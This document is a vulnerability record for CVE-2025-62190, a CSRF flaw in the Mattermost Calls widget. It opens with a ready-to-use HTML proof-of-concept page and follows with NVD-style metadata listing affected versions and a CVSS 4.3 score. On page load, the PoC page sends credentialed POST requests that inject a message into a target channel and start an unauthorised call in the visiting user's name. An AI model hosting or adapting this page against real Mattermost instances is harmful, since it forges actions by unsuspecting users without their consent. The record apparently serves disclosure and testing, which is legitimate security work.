CVE-2025-62190

<!-- CSRF PoC for CVE-2025-62190 --> <!DOCTYPE html> <html> <head> <title>Mattermost CSRF Attack PoC</title> </head> <body> <h1>Mattermost Calls CSRF PoC - CVE-2025-62190</h1> <p>This PoC demonstrates the CSRF vulnerability in Mattermost Calls widget.</p> <script> // Configuration - Replace with actual values const MATTERMOST_URL = 'https://your-mattermost-instance.com'; const TARGET_CHANNEL_ID = 'target-channel-id'; const MALICIOUS_MESSAGE = 'This is an injected malicious message'; // Attack 1: Inject message into channel async function injectMessage() { const messagePayload = { channel_id: TARGET_CHANNEL_ID, message: MALICIOUS_MESSAGE, root_id: '', file_ids: [] }; // This request will be automatically sent with user's cookies // No CSRF token validation in vulnerable versions fetch(`${MATTERMOST_URL}/api/v4/posts`, { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify(messagePayload) }); } // Attack 2: Initiate unauthorized call async function initiateCall() { const callPayload = { channel_id: TARGET_CHANNEL_ID, // Additional call parameters }; fetch(`${MATTERMOST_URL}/api/v4/calls/start`, { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify(callPayload) }); } // Auto-execute on page load window.onload = function() { console.log('CSRF PoC executing...'); injectMessage(); initiateCall(); }; </script> <p>If you see this text, the attack has been executed.</p> </body> </html>

{"cve": {"id": "CVE-2025-62190", "sourceIdentifier": "[email protected]", "published": "2025-12-17T13:15:58.370", "lastModified": "2025-12-29T18:51:51.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 and Mattermost Calls versions <=1.10.0 fail to implement CSRF protection on the Calls widget page which allows an authenticated attacker to initiate calls and inject messages into channels or direct messages via a malicious webpage or crafted link"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.7", "matchCriteriaId": "EB4AD9AE-B2DB-4D49-87AD-FA5F9CE6A0C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.3", "matchCriteriaId": "DD0ED714-56F9-4C84-B84D-3BF658940568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.5", "matchCriteriaId": "6130B691-5017-418D-A28A-84A83AA2496C"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}